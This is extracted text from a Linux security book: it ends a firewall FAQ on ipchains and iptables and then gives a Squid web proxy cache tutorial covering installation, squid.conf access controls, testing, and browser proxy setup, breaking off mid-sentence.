Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: I am using Iptables.Why can’t I use the –MASQ target for the INPUT chain? +A: Because Iptables uses a completely different table to do masquerading.In +Iptables,the INPUT chain is used for packets that are destined to the firewall +system.You must create a rule that specifies the nat table. +Q: I just got used to Ipchains rather than using ipfwadm.Now,I have to get used +to using Iptables.Will this ever end? +A: Welcome to the world of the open source community,my friend.It is hoped +that Iptables will undergo evolutionary rather than revolutionary changes from +now on.Because it is much more sophisticated than Ipchains,and because it +will take some time for the 2.5 kernel to become stable enough to become 2.6, +it is likely that we will not have to learn a new application any time soon. +Q: I am using Firestarter.It has automatically discovered my interface.However, +it seems to block all traffic,even if I specify that I am using SSH and other +protocols.What do I do? +A: Manually edit the Iptables chains and remote any offending entries.You can +also access the Dynamic rules tab and open up services to specific hosts there. +Because Firestarter uses the -A option to add a rule,any addition you specify +will become an exception to the restrictive rule set created by Firestarter. +Q: Do I have to keep Firestarter running in order for the firewall to be in place? +A: No.However,the Firestarter “Firewall hits”list will not be updated,nor will +Firestarter inform you of hits using the sound option.If you establish logging +by issuing manual Ipchains or Iptables commands,you can check hits by +viewing the /var/log/messages file using the tail -f command. +Q: When I use Iptables to list my rules,the listing just hangs,or is very slow. +What is going on? +www.syngress.com + +138_linux_09 6/20/01 9:49 AM Page 506 +506 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +A: One of your rules has disabled DNS lookup.You will find that the same +problem will arise if you try to use netstat.Either delete the offending rule,or +append a rule that opens up ports above 1023 to access your DNS server at +both UDP and TCP port 53. +Q: I am still using a dial-up connection (ppp0).Can I use this dial-up modem to +provide access to the rest of my network? +A: Certainly.Just substitute the ppp0 interface for eth0 in many of the examples +in this chapter,and you will be up and running in no time. +Q: I have set my default policy to DROP,and now I can’t access anything on the +network.I have flushed all of the rules,but the policy is still at DROP.What +do I do now? +A: Use the –P option to change the default policy to ACCEPT. +Q: I am using Ipchains,yet I can’t seem to add anything to the INPUT, +FORWARD,or OUTPUT chains.Why not? +A: Because Ipchains is case sensitive,and does not use the INPUT,FORWARD, +or OUTPUT chains.Specify the input,forward,or output chains,and you +will be in good shape.This can be rather confusing,because Iptables is also +case specific,and uses the INPUT,FORWARD,and OUTPUT chains. +Q: I have configured masquerading,and have also created several rules that seem +to protect my network.However,I used commands different from yours. +How come? +A: In Linux,as with all of the Unix community,there is always more than one +way to accomplish your goals.This can be liberating,but also rather frus- +trating.If you are able to get a secure firewall going,congratulations.Now, +just remember that you need to test and log your firewall so that you verify +that it is helping to protect your network. +Q: Is a Linux firewall ideal for a corporate environment? +A: The answer for this question lies with management,really.Many busy,large +environments use Linux routers and firewalls.However,you should ensure +that your company’s IT and security policies allow the use of Linux systems. +You should also test your implementation in an isolated subnet before +bringing it into production. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 507 +Chapter 10 +Deploying the Squid +Web Proxy Cache +Server +Solutions in this chapter: +(cid:2) Benefits of Proxy Server Implementation +(cid:2) Differentiating between a Packet Filter +and a Proxy Server +(cid:2) Implementing the Squid Web Proxy +Cache Server +(cid:2) Configuring Proxy Clients +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +507 + +138_linux_10 6/20/01 9:50 AM Page 508 +508 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Introduction +In Chapter 9,“Implementing a Firewall with Ipchains and Iptables,”you learned +about packet filtering.However,packet filtering is only one way to create a net- +work perimeter.Using proxy cache services,it is possible to filter traffic in a +more specific way.In this chapter,you will learn the advantages of using proxy +caching on your network,and understand the differences between a packet filter +and a proxy server.You will also configure a proxy caching server and a proxy +client,and test and troubleshoot a proxy cache server.The proxy cache you will +implement in this chapter is called the Squid Web Proxy Cache server. +Benefits of Proxy Server Implementation +A proxy server is an intermediary between hosts on different or separate net- +works,such as a local area network (LAN) and the Internet.It is used to imple- +ment caching for certain services,and for security and administrative control. +Proxy servers can implement different functions,such as proxy caching and +Network Address Translation (NAT).NAT is technically the function of a +network-level gateway,but some vendors include this functionality in their +proxy server products as well. +Proxy Caching +Proxy cache servers are implemented at the Application layer and process specific +Internet protocols,such as Hypertext Transfer Protocol (HTTP) and File Transfer +Protocol (FTP).Rules are set up on the proxy server to determine how a work- +station request should be processed. +One of the main tasks of a proxy server is to cache Web pages and FTP files +for proxy clients.These types of proxy servers are called proxy cache servers. +Caching increases the performance of the network by decreasing the amount of +data transferred from outside of a local network. +To implement proxy caching,each workstation on the network is configured +as a proxy client for a specific service.For example,a Web proxy client would +configure his or her browser to acknowledge the proxy server.When the client +makes a Web browser request to download a certain Web page,the client’s +browser makes the request to the proxy server.The proxy server has a cache of +recently visited Web pages.This cache contains Web pages that workstations +throughout the network have recently downloaded. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 509 +Deploying the Squid Web Proxy Cache Server • Chapter 10 509 +The proxy server checks its cache to see if the Web page exists.If the page +exists in the cache,then the cached page is sent to the client.If the page does not +exist in the cache,the proxy server downloads the client’s Web page from the +specific Web site,enters it into the cache,and sends the page to the workstation. +To ensure that the Web pages in the proxy cache are not out of date,proxy +cache data expires after a preset time.In the Squid program,this setting is called +the object refresh time.The refresh time ensures that old data is not transferred to +the proxy clients. +This process increases network performance because the Web page is imme- +diately downloaded to the client from the proxy server without having to down- +load the Web page from the Internet each time.This speeds up Internet access on +the network and saves bandwidth.This seemingly simple operation of adding a +small amount of data to a Web cache has a significant impact on browsing speed +and bandwidth usage over the network.The Web proxy concept is shown in +Figure 10.1. +Figure 10.1 Demonstrating a Proxy Server’s Web Caching Function +Send Web Page to Yes +Workstation +Web Is Web Page in No Download Web +Page Page to Internet +Request Proxy Cache? from Proxy Cache +Workstation Proxy Server +Web Browser +NOTE +One benefit of proxy servers is that the proxy administrator can add rules +to filter content. For example, you can filter out Web page requests that +contain certain words in the address. If a supervisor from marketing +complains that his marketing personnel are spending all of their time +looking for other jobs, he could have the administrator create proxy rules +to filter out the addresses of popular job search sites, denying all +requests for, say, www.needajobfast.com! +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 510 +510 Chapter 10 • Deploying the Squid Web Proxy Cache Server +NOTE +The correct term for cached content, such as text files, sound files, video +clips, etc., is object. +Table 10.1 lists the advantages of using a proxy-caching server. +Table 10.1 Benefits of Proxy Caching +Benefit Description +Reduced bandwidth costs Internet infrastructure costs are reduced +significantly because proxy caching reduces +bandwidth usage. +Increased network The network runs faster because less bandwidth +performance is used to access the Internet. +Increased network Even networks that have a great deal of band- +performance during traffic width can experience traffic spikes during major +spikes events, such as a popular video-streamed broad- +cast. Caching can help prevent these slow +response periods. +Load balancing Caching servers can cache Web site objects to +balance the original Web server’s load. +Cache aborted requests If a user aborts a download, proxy caches can +continue to download the object so it will be +available to the next user. +Functions when Internet If your Internet connection fails, the proxy cache +connection is down will log the error and send the requested objects +(if available, including out-of-date objects) from +the cache. The impact of a large-scale Internet +outage is reduced. +Network Address Translation +The proxy cache is only one mechanism of a proxy server.Many proxy servers +are distributed with the ability to support Network Address Translation (NAT). +NAT allows a company’s internal network address to be hidden from the +Internet.The company is represented on the Internet as one IP address that is not +related to the company’s internal IP addresses. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 511 +Deploying the Squid Web Proxy Cache Server • Chapter 10 511 +NOTE +NAT is technically the function of a network-level gateway, but many +vendors, such as Microsoft, include this functionality in their proxy server +products. +Using a proxy server,all Internet-bound traffic within the company is sent to +the proxy server.The proxy gives each packet another IP address before transmit- +ting it across the Internet.When the response packet arrives,the proxy server +sends it to the appropriate company host who made the initial request.This pro- +cedure protects the actual addresses of the internal network from the Internet. +Therefore,it is much more difficult for a hacker to attack a system,since the +address of the protected system is unknown and is not accessible directly from the +Internet.Figure 10.2 shows the NAT process using a proxy server. +Figure 10.2 Demonstrating the Network Address Translation (NAT) Function +192.168.10.20 All Company Hosts are represented by the +Proxy Server address of 24.130.10.205 +on the Internet. +192.168.10.10 24.130.10.205 +Company Ethernet Internet +Proxy Server +with NAT +192.168.10.30 +192.168.10.22 +This chapter focuses on the caching services of a proxy server by implementing +the Squid Web Proxy Cache service.NAT is presented so you will understand this +network-level gateway service that is often added to proxy servers. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 512 +512 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Differentiating between a +Packet Filter and a Proxy Server +It is common to confuse a packet filter with a proxy server.Both services are +placed on the network edge.Both serve as an intermediary between a LAN and +the Internet.Both have the capability to filter traffic transmitted in to and out of +the network.Both use rules to determine whether certain traffic is allowed to +pass through the server or be discarded.So,you may ask,what is the difference? +Basically,a packet filter does not go as deep into a packet as a proxy server.A +packet filter analyzes traffic at the Network (Layer 3) and Transport layers (Layer +4) of the Open Systems Interconnection (OSI) reference model.For example,a +packet filter determines whether it will allow a certain IP address or IP address +range to pass through.If your network is attacked from a consistent range of +source IP addresses,you can create a rule to discard all packets that originate from +that IP address range.You can also filter traffic by service,or port number.For +example,you could create a rule to discard all traffic directed at certain listening +ports,such as FTP,rlogin and Telnet traffic,or within a port number range.You +can also filter ICMP packets by type/code,which allows you to discard only cer- +tain types of ICMP traffic.This is helpful in protecting yourself from common +distributed denial-of-service (DDoS) attacks.Because packet filters work at these +layers,they are often implemented on routers at the network edge. +A proxy server is capable of analyzing packets at the Application layer (Layer +7) of the OSI model.This allows much more flexibility,because the traffic within +one service,such as port 80 (HTTP) traffic,can be filtered.As mentioned earlier, +this allows proxy servers to analyze HTTP or FTP traffic,and determine whether +the traffic will pass through.If a rule exists that prevents any Web address with +“jobs”in it,then any HTTP URL request with “jobs”in it will be discarded.You +will implement a Web proxy cache server in the next section.A proxy server is +usually installed on an application server at the network edge.Figure 10.3 shows +one of the differences between a packet filter and a proxy server. +In this chapter,you will implement a proxy server with Web caching services. +The proxy server you will install,configure,and run is the Squid Web Proxy +Cache,which is a Unix full-featured Web proxy cache. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 513 +Deploying the Squid Web Proxy Cache Server • Chapter 10 513 +Figure 10.3 One of the Differences between a Packet Filter and a +Proxy Server +Workstation Caches HTTP and FTP traffic, other +URLs, and DNS lookups. Also filters +URLs based on content. +Company Ethernet Internet +IP Packet Filter +Web Proxy Cache Server and Router +Printer Filter packets based on IP addresses, IP +Workstation address ranges, and TCP/UDP port +numbers and ranges. +Implementing the Squid +Web Proxy Cache Server +The Squid Web Proxy Cache server is a free,Unix open source Web proxy cache. +It allows administrators to set up a Web proxy caching service,add access controls +(rules),and even cache DNS lookups.The Squid home page is located at +www.squid-cache.org,as shown in Figure 10.4. +Figure 10.4 Squid Web Proxy Cache Home Page +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 514 +514 Chapter 10 • Deploying the Squid Web Proxy Cache Server +NOTE +It is important to point out that Squid is a Web proxy-caching server +only. It does not support other proxy functions, such as NAT or firewall +functions. +Squid originated from a program developed by the Harvest project called +cached (Cache Daemon).The National Science Foundation (NSF) funds Squid +development through the National Laboratory of Network Research (NLANR). +Squid is a Web proxy cache that conforms to the HTTP 1.1 specification.It is +used only by proxy clients,such as Web browsers,that access the Internet using +HTTP,Gopher,and FTP.Furthermore,it does not handle the majority of Internet +protocols.That means that it cannot be used for protocols that support applications +such as videoconferencing,newsgroups,RealAudio,or video games such as Quake. +The main reason for this limitation is that Squid does not support client programs +that use UDP.Squid uses UDP for inter-cache communication only. +Any client protocol supported by Squid must be sent as a proxy request in +HTTP format.Most browsers support this function,so the following client pro- +tocols are supported on most networks that implement Squid: +(cid:2) FTP +(cid:2) HTTP +(cid:2) Secure Sockets Layer (SSL) +(cid:2) Wide Area Information Server (WAIS) +(cid:2) Gopher +The protocols will work if you request them using your browser,and if your +browser is configured as a proxy client to the Web proxy-cache server.You will +accomplish this task later in the chapter. +Squid also supports internal and management protocols.These protocols are +used between caches that might exist on different (or the same) proxy-caching +servers,or for managing a proxy cache.The supported inter-cache and manage- +ment protocols are: +(cid:2) Internet Cache Protocol (ICP) Queries other caches for a specific +object. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 515 +Deploying the Squid Web Proxy Cache Server • Chapter 10 515 +(cid:2) Cache Digest Retrieves an object index from other caches. +(cid:2) HTTP Retrieves objects from other caches. +(cid:2) Hypertext Caching Protocol (HTCP) Currently being added to +Squid (not implemented on a wide scale yet). +(cid:2) Simple Network Management Protocol (SNMP) Retrieves infor- +mation about the proxy cache and sends it to a Network Management +Station (NMS) for analysis. +Despite these limitations,Squid is very popular because the Web proxy-cache +services are integral to almost all networks connected to the Internet.For +example,the products listed in Table 10.2 are based on Squid. +Table 10.2 List of Commercial Products Based on Squid +Product Description +CacheRaq4 Squid-based proxy cache designed for Linux with a MIPS +CPU. Sun Microsystems acquired Cobalt, the creator of this +product. +Tsunami Squid-based proxy cache that runs on Linux. Swell +Technologies is the creator of this product. +CacheXpress Squid-based proxy cache created by Industrial Code and +Logic (INDCL). Includes a version for Windows. +Netfilter4.1 A monitoring and traffic management program based on +Squid and developed by nXp Technologies. +N2H2 Provides products for filtering solutions. For example, their +N2H2 for Microsoft Proxy 2.0 and N2H2 for ISA add +enhanced content filtering to these products, and are based +on Squid. +These commercial products are supported by their various vendors.Therefore, +technical support is available in case you run into any problems.Squid is supported +by Visolve.com,which provides free basic support for open source products.These +products include Squid,Apache,and Linux itself.Their Web site is located at +www.visolve.com.The Squid site contains links to Visolve.com—use their free +services at your own risk.The Visolve.com Web site is shown in Figure 10.5. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 516 +516 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Figure 10.5 Free Basic Support for Squid and Other Open Source Products +at Visolve.com +System Requirements Specific to Proxy Caching +By nature,Squid uses certain system resources more than others do.The two +main hardware subsystems that Squid (or any other proxy cache) uses heavily and +must therefore perform well are the disk random seek time and the amount of +system memory. +(cid:2) Disk random seek time When you purchase a disk,the documenta- +tion should include a random seek time number.For a proxy cache, +make sure this number is as low as possible.The problem is that oper- +ating systems try to speed up disk access times using various methods +that usually slow the system’s performance. +(cid:2) Amount of system memory RAM is also extremely important +when using a proxy cache.Squid keeps an in-memory table of its objects +in RAM,which should always remain in RAM.If part of the table goes +to swap,the performance of Squid is greatly degraded.Squid is one pro- +cess,so any swapping will slow the program.To give you an idea of the +object index size,if you have 16GB of objects stored in your cache,you +will require approximately 96MB of RAM for the object index.Ensure +you have as much RAM as possible in the system. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 517 +Deploying the Squid Web Proxy Cache Server • Chapter 10 517 +Other system requirements,such as CPU speed,are not as important. +Processor speed will be noticed during startup when the system must determine +the contents of its cache and create the object index.Other than that,a single +CPU system usually performs well.A multiprocessor system does not usually +make a difference in the proxy cache performance because Squid contains a small +portion of threaded code. +Installing Squid +Squid is provided as an RPM package in Red Hat Linux.If you completed a +custom installation and installed everything on your Red Hat Linux system,then +Squid is already installed.If not,you need to download it at a trusted site,or +install it from your Red Hat CD.We have provided version 2.3 on the com- +panion CD (squid2.3.STABLE4-1.i386.rpm).You can also download the source +files and compile it.The source code is beneficial because it allows you to turn +on some compile-time options that are not included in the binary version.For +example,SNMP support is not included in the binary version.If SNMP support +is required,you must download and compile the source version of Squid. +The Squid developers only create the source code,but they concentrate on +making it as portable as possible.Therefore,other developers are responsible for +porting to the different operating systems.The following operating systems have +Squid available: +(cid:2) Linux +(cid:2) SCO Unix +(cid:2) BSD/OS +(cid:2) NetBSD +(cid:2) MkLinux +(cid:2) Solaris +(cid:2) NeXTStep +(cid:2) OS/2 Warp +(cid:2) AIX +The location of each of these download sites is available at www.squid-cache +.org/platforms.html.This Web site changes as Squid is ported to new operating +systems.If your operating system is different from Linux,then download the +corresponding version from the site,as shown in Figure 10.6. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 518 +518 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Figure 10.6 Downloading Ported Versions of Squid for Multiple Platforms +WARNING +When you download binary RPMs, always make sure that you are down- +loading them from a trusted source. RPMs are installed as root, which +means they can do anything to your system. They can add new users, +reconfigure settings, install new files, and overwrite existing ones. It is +possible that an unscrupulous programmer could purposely distribute +RPMs meant to exploit and install vulnerabilities into systems. To avoid +any security threats, always download your binary RPMs from a trusted +source. Most vendor and open source project download sites can be +trusted. +You can download binary versions of squid at the Red Hat Web site at +www.redhat.com.You can download the Squid development team source +code from the Squid site at www.squid-cache.org/Versions/v2/,as shown in +Figure 10.7.Make sure you download a stable version of Squid.Any Squid 2.x +stable version will perform well on your system.Both of the Squid download +sites mentioned are trusted. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 519 +Deploying the Squid Web Proxy Cache Server • Chapter 10 519 +Figure 10.7 Downloading the Squid Source Version from the Trusted +Squid Site +For the following demonstration,we’ll use the Red Hat Linux binary RPM +included with the Red Hat Linux 7.x distribution.For instructions on compiling +the Squid source version,visit http://squid-docs.sourceforge.net/latest/html/ +x366.htm.Complete the following steps to make sure that Squid is installed on +your Red Hat Linux system. +1. To ensure the Squid RPM is installed on your system,enter the +following: +rpm –qa | grep squid +2. You should receive the following response if Squid is installed: +squid-2.3.STABLE4-1 +If you receive this response,you are ready to configure Squid. +3. If you receive no response,access www.redhat.com to click the +Download link.Perform an RPM search by entering squid into the +Find Latest RPMs By Keyword field.Click Search.The latest +Squid version provided as an RPM will appear;in this case,it is squid- +2.3.STABLE4-1,as shown in Figure 10.8.This RPM is also located on +the accompanying CD. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 520 +520 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Figure 10.8 Downloading a Squid RPM for Red Hat Linux 7 +4. Download the latest stable version of Squid. +5. Install the RPM by using the rpm –i command.Once installed,you are +ready to configure Squid. +Configuring Squid +Once Squid is installed,you must configure it using the /etc/squid/squid.conf +file.This file defines the Squid configurations,such as the HTTP port number on +which Squid listens for HTTP requests,incoming and outgoing requests,timeout +information,and firewall access data.During Squid installation,a /etc/squid/ +squid.conf file was created. +The squid.conf file is configured for the Squid configuration default settings +and can be used after several changes.You must make changes because squid.conf +denies access to all browsers by default.Squid is completely useless until you +make changes to the squid.conf. +As it states in the default Squid configuration file,if you do not need to +change a default setting,then you do not need to uncomment the setting.The +default Squid configuration file,/etc/squid/squid.conf,is shown in Figure 10.9. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 521 +Deploying the Squid Web Proxy Cache Server • Chapter 10 521 +Figure 10.9 Configuring Squid with the /etc/squid/squid.conf File +Each configuration option in squid.conf is identified as a tag.Each tag is a +Squid configuration.For example,the HTTP client request port setting is identi- +fied as the http_port tag.We will refer to the squid.conf settings as tags. +In Figure 10.9,the squid.conf file displays the Network Options section.It +shows the configuration for the socket address on which Squid will listen for +HTTP client requests.The default port number specified,TCP port 3128,is also +the default port used by proxy clients to send requests to the proxy cache server. +If you change this port on the proxy cache server,you will need to change it on +the proxy clients as well. +NOTE +Notice that all of the tags in the squid.conf file are commented out. This +means that Squid will use the default settings when no tags are speci- +fied. In theory, this file could be empty, and Squid will run the defaults +settings just the same. If you specify a tag, then Squid will use that tag +instead of the default setting. Also note that a file containing the orig- +inal default settings of /etc/squid/squid.conf is listed in /etc/squid/ +squid.conf.default. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 522 +522 Chapter 10 • Deploying the Squid Web Proxy Cache Server +The Squid “accelerator mode”mentioned in the http_port description allows +Squid to act as a Web server.Squid basically translates client Web requests by +changing the destination server and port,and sends the request to a Web server. +The response is cached,and Squid sends it to the client.This reduces traffic to +the Web server (it “accelerates”the slow Web server) and can protect the Web +server through filtering.This chapter will not demonstrate accelerator mode,but +you should be aware of it. +The http_port Tag +The http_port tag configures the HTTP port on which Squid listens for proxy +clients.By default,Squid does not listen for proxy clients on any ports.Therefore, +you have to open at least one port for Squid to work using the http_port tag. +The default port is 3128,as shown in Figure 10.9.Port 8080 is also often used +for this service.You can configure Squid to listen on both ports by including each +number in the http_port tag.In the following steps,you will configure Squid to +listen on ports 3128 and 8080 for proxy clients. +1. Open the /etc/squid/squid.conf file by entering: +vi /etc/squid/squid.conf +2. Press i to enter Insert mode.Locate the http_port setting: +# http_port 3128 +3. Remove the comment (#) and add port 8080 to the setting by entering: +http_port 3128 8080 +4. Your http_port tag should resemble Figure 10.10. +Figure 10.10 Configuring the http_port tag to Listen on Ports 3128 +and 8080 +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 523 +Deploying the Squid Web Proxy Cache Server • Chapter 10 523 +5. Click ESC to exit Insert mode.Enter the following to write the file: +:w +You will configure the squid.conf file further in the next section. +The Cache_dir Tag +The cache_dir tag specifies where the cached data is stored.You can specify dif- +ferent directories for your cache directory by using more than one cache_dir tag +in squid.conf.For this demonstration,you will only use one cache directory. +Figure 10.11 shows the default settings for the cache_dir tag. +Figure 10.11 Configuring the cache_dir Tag in the squid.conf File +By default,the following cache_dir tag value is presented: +cache_dir ufs /var/spool/squid 100 16 256 +The default cach_dir tag is broken down and defined in Table 10.3. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 524 +524 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Table 10.3 Defining the Default cache_dir tag in the squid.conf File +Tag Value Description +cache_dir Defines the values of the cache directory used for Squid. +ufs Squid assumes that a Unix file system (ufs) is used for the +cache’s storage system. +/var/spool/squid The directory for all cached objects will be /var/spool/squid. +100 The amount of cached data that Squid will store in the +caching directory. The default cache size is 100MB. +16 Sets the number of subdirectories to create in the cache. +Squid then divides the cached objects into these sub- +directories to speed up disk access. For example, Squid will +find an object much faster by searching several smaller +directories of files, instead of one directory with several +hundred thousand objects. +256 Sets the number of second-tier subdirectories to create in +the cache. If your cache is extremely large, you may want +to increase these values. For this demonstration, and for +most implementations, these subdirectory values are +sufficient. +You can change these values to meet your particular needs.If you do, +remember to remove the comment (#) in front of the tag to activate your +changes.If you do not remove the comment,the default values will be used. +For this demonstration,you will use the cache_dir tag default values.The +/var/spool/squid caching directory was automatically created when Squid was +installed.Verify that the default cache directory exists by completing the +following steps: +1. Access the spool directory by entering the following command: +cd /var/spool +2. List the directory contents to confirm your caching directory exists. +Enter: +ls +3. You should receive a response similar to the following,depending on +your system configuration.The squid directory is included. +Anacron cron lpd mqueue rwho slrnpull up2date uucppublic +voice at fax mail news samba squid ucp vbox +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 525 +Deploying the Squid Web Proxy Cache Server • Chapter 10 525 +The acl Tag +The acl tag allows you to define an access list.The access list can include client IP +addresses,a range of IP addresses,a URL host’s IP address,a local socket IP +address,or domains.Any access list you define using the acl tag can later be used +to allow or deny requests to the cache server.For example,if you define a range +of addresses using the acl tag,you can allow any system using an address from this +range of IP addresses to use the proxy cache.The acl tag section of the squid.conf +file is shown in Figure 10.12. +Figure 10.12 Configuring the acl Tag to Define Access Lists +It is important for you to define access control lists.If you do not,you will +not have any definitions to create customized rules.When Squid finds a rule, +such as “deny all systems from the IP address range of 192.168.3.1 through +192.168.3.254,”it will check that a corresponding acl is created that defines +this IP address range. +In this demonstration,you will create an access list that includes the proxy +clients that will access your proxy cache server.You will define them by IP +address. +1. Open the /etc/squid/squid.conf file by entering (if not already opened): +vi /etc/squid/squid.conf +2. Locate the acl tags defaults section.Press i to enter Insert mode. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 526 +526 Chapter 10 • Deploying the Squid Web Proxy Cache Server +3. Enter the following acl tags immediately after the acl localhost src +127.0.0.1/255.255.255.255 entry (your addresses will differ depending +on your proxy clients): +acl proxy_client1 src 24.130.8.227/255.255.252.0 +acl proxy_client2 src 24.130.10.205/255.255.252.0 +4. Your squid.conf file should resemble Figure 10.13. +Figure 10.13 Defining Specific Proxy Clients with the acl Tag +5. Press ESC to exit Insert mode.Enter the following to write the file: +:w +You will configure the squid.conf file further in the next section. +The http_access Tag +The http_access tag permits or denies access to Squid.You can allow or deny all +requests.You can also allow or deny requests based on a defined access list.If you +remove all of the http_access entries,all requests are allowed by default. +Proxy clients will be unable to use the Squid proxy-caching server until you +modify the http_access tags.Please note that some level of access control is rec- +ommended,so do not remove all of the http_access tags.The http_access tag sec- +tion of the squid.conf file is shown in Figure 10.14. +For this demonstration,you will set up a simple access control.You will allow +only the systems on your network to use the proxy cache.Each system will be +specified by its IP address,as defined in the access control list (acl tag).This +system works well for small businesses.To implement access control in a larger +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 527 +Deploying the Squid Web Proxy Cache Server • Chapter 10 527 +organization,you should create classes or users,and then allow or deny these +classes.You can place stricter access control after Squid is running by viewing the +documentation at www.squid-proxy.org. +Figure 10.14 Configuring the http_access tag to Allow or Deny +Squid Requests +NOTE +Squid should never be used without some type of authentication system +or access control list. You must restrict Internet users from relaying +requests through your Web proxy cache. +To implement access control to your proxy cache,complete the following +steps.In this demonstration,there are two proxy clients defined in the acl, +proxy_client1 and proxy_client2,that need to use the proxy cache.By default, +the localhost can already use the proxy cache. +1. Open the /etc/squid/squid.conf file by entering (if not already opened): +vi /etc/squid/squid.conf +2. Locate the http_access tags.Press I to enter Insert mode. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 528 +528 Chapter 10 • Deploying the Squid Web Proxy Cache Server +3. Enter the following http_access tags immediately before the http_access +deny all entry (your acl names might differ): +http_access allow proxy_client1 +http_access allow proxy_client2 +4. Your squid.conf file should resemble Figure 10.15. +Figure 10.15 Configuring the http_access Tag to Allow Specific +Proxy Clients +5. Press ESC to exit Insert mode.Enter the following to write and quit +the file: +:wq +Always leave the default access control rules,such as http_access deny all,in +your squid.conf file.These entries stop people from exploiting your cache.For +example,although the last entry states http_access deny all,it still allows incoming +requests from the clients you explicitly identify.All other requests will be denied. +The default http_access deny entries in the first part of Figure 10.15 protect +your cache from some obscure vulnerabilities.These problems include cache tun- +neling with SSL CONNECTs,bandwidth loops that consume bandwidth,and +other access concerns. +Starting and Testing Squid +You have configured Squid for your network environment.To determine if it is +functioning,you must start the Squid service,and then use the Squid client pro- +gram on the localhost to ensure Web page data is being written to the cache.The +Squid client displays data as it is written to the cache,and is extremely helpful in +proving the proxy cache is working,and when troubleshooting any problems. +Complete the following steps to start and test Squid. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 529 +Deploying the Squid Web Proxy Cache Server • Chapter 10 529 +1. Start the Squid proxy cache by entering the following: +/etc/rc.d/init.d/squid start +2. Test that Squid is working by using the Squid client program.Enter: +client http://www.squid-cache.org +3. The data written to the cache is displayed in your terminal,as shown in +Figure 10.16.If no data is written,you need to revisit the squid.conf file +and determine any incorrect configurations. +Figure 10.16 Testing Squid Using the Squid Client to Witness Web +Page Data Written to the Proxy Cache +You have successfully started and tested the Squid Web Proxy Cache server. +Now you must configure proxy clients to use the cache.You will learn how to +configure a proxy client in Netscape Navigator,Internet Explorer,and Lynx. +Configuring Proxy Clients +A proxy client is a system that uses the services of a Web proxy-caching server. +Depending on your network configuration,a client may or may not have to be +configured as a proxy client in order to use a Web proxy cache server.For +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 530 +530 Chapter 10 • Deploying the Squid Web Proxy Cache Server +example,some firewalls are configured to forward all port 80 traffic leaving the +network to the Web proxy cache server.In this case,the proxy clients do not +need manual configuration.In other cases,the client automatically detects the +proxy server information on the network and uses it for all Internet access.For +this demonstration,you will configure a proxy client to use your Squid Web +Proxy Cache. +Configuring a proxy client is far easier than configuring Squid.All proxy client +configuration is completed within the browser application.This demonstration will +show you how to configure three browsers for a proxy server.One system is a +Linux system running Netscape Navigator and Lynx.The other system is a +Microsoft Windows Millennium Edition system running Internet Explorer. +NOTE +The proxy clients you configure in this demonstration must be the same +proxy clients you added to the /etc/squid/squid.conf file. +Configuring Netscape Navigator and Lynx +In this demonstration,you will configure Netscape Navigator and Lynx on a +Linux system.The client configured in the following steps is the proxy_client2 +acl entry from the squid.conf file. +Configuring Netscape Navigator +In this section,you will configure the Netscape Navigator browser so it sends all +Web requests to the Squid Web Proxy Cache server. +1. Log in to a Linux proxy client that you configured in squid.conf. +2. Start X Windows by entering: +startx +3. Open Netscape Navigator. +4. Click the View menu,and choose the Preferences option. +5. In the Category column,expand the Advanced tree and click +Proxies.The proxy configuration window appears.Your screen will +resemble Figure 10.17. +6. Click Manual proxy configuration.View will activate.Click View. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 531 +Deploying the Squid Web Proxy Cache Server • Chapter 10 531 +Figure 10.17 Configuring a Network Proxy for Netscape Navigator +7. You can configure a proxy for each Internet protocol that Netscape sup- +ports.Enter the IP address of the Squid Web Proxy Cache server in the +HTTP Proxy field.For example,if your Squid system was 24.130.8.170 +and you configured Squid to listen for cache request on port 3128,you +would enter the values shown in Figure 10.18. +NOTE +Squid supports caching for the additional Internet protocols. For this +demonstration, we are only testing Web page caching. +8. Click OK twice to return to the browser. +9. In Netscape Navigator,enter the following URL:www.squid-cache +.org. +10. The Squid home page will appear.If not,your browser proxy settings are +incorrectly configured. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 532 +532 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Configuring Lynx +In this section,you will configure the Lynx command-line browser so it sends all +Web requests to the Squid Web Proxy Cache server.Pico is used in this demon- +stration to facilitate the search.You can use any text editor you choose. +1. Access the Linux lynx configuration file by entering: +pico /etc/linux.cfg +2. Press ALT+W to receive a search prompt.At the search prompt,enter: +#http_proxy +3. Change the http_proxy configuration line from: +#http_proxy:http://some.server.dom:port/ +to +http_proxy:http://24.130.8.170:3128 +4. Your screen will resemble Figure 10.19. +Figure 